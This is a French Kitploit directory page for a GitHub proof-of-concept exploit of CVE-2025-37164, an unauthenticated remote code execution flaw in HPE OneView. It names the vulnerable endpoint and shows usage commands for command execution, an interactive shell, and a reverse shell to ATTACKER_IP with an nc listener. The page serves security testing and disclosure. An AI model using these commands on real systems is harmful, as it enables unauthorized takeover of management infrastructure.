Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-37164-PoC — PoC pour CVE-2025-37164 | Kitploit
Outils/GitHubGitHub/g0vguy/cve-2025-37164-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubg0vguy/cve-2025-37164-poc

CVE-2025-37164-PoC

PoC pour CVE-2025-37164

Voir le dépôt
62il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-37164 - PoC RCE non authentifiée HPE OneView

Exploit Proof-of-Concept pour CVE-2025-37164, une vulnérabilité critique (CVSS 10.0) d'exécution de code à distance non authentifiée dans HPE OneView.

AVERTISSEMENT

CE LOGICIEL EST FOURNI UNIQUEMENT À DES FINS ÉDUCATIVES ET DE TESTS DE SÉCURITÉ AUTORISÉS.

  • Utilisez uniquement sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation écrite explicite de test
  • L'accès non autorisé à des systèmes informatiques est illégal
  • L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par cet outil
  • Cet outil est destiné à la recherche en sécurité défensive et aux tests d'intrusion dans des environnements contrôlés

Détails de la vulnérabilité

  • ID CVE: CVE-2025-37164
  • Score CVSS: 10.0 (CRITIQUE)
  • Fournisseur: Hewlett Packard Enterprise (HPE)
  • Produit: HPE OneView (versions antérieures à 11.0)
  • Type: Exécution de code à distance non authentifiée
  • Correctif: Mettre à niveau vers HPE OneView 11.0 ou supérieur

Analyse technique: La vulnérabilité se situe dans le point de terminaison PUT /rest/id-pools/executeCommand qui ne nécessite pas d'authentification et transmet directement l'entrée contrôlée par l'utilisateur à Runtime.exec().

Prérequis

  • Python 3.6+
  • Bibliothèque requests (pip install requests)
  • Instance HPE OneView vulnérable (avec la fonctionnalité « id pools » activée)

Utilisation

root@kitploit:~
# Test if target is vulnerable
python3 cve-2025-37164.py -t http://target-ip --check

# Execute a single command
python3 cve-2025-37164.py -t http://target-ip -c "id"

# Interactive command shell
python3 cve-2025-37164.py -t http://target-ip -i

# Attempt reverse shell (requires listener)
# On attacker machine: nc -lvnp 4444
python3 cve-2025-37164.py -t http://target-ip --lhost ATTACKER_IP --lport 4444
Télécharger l’outil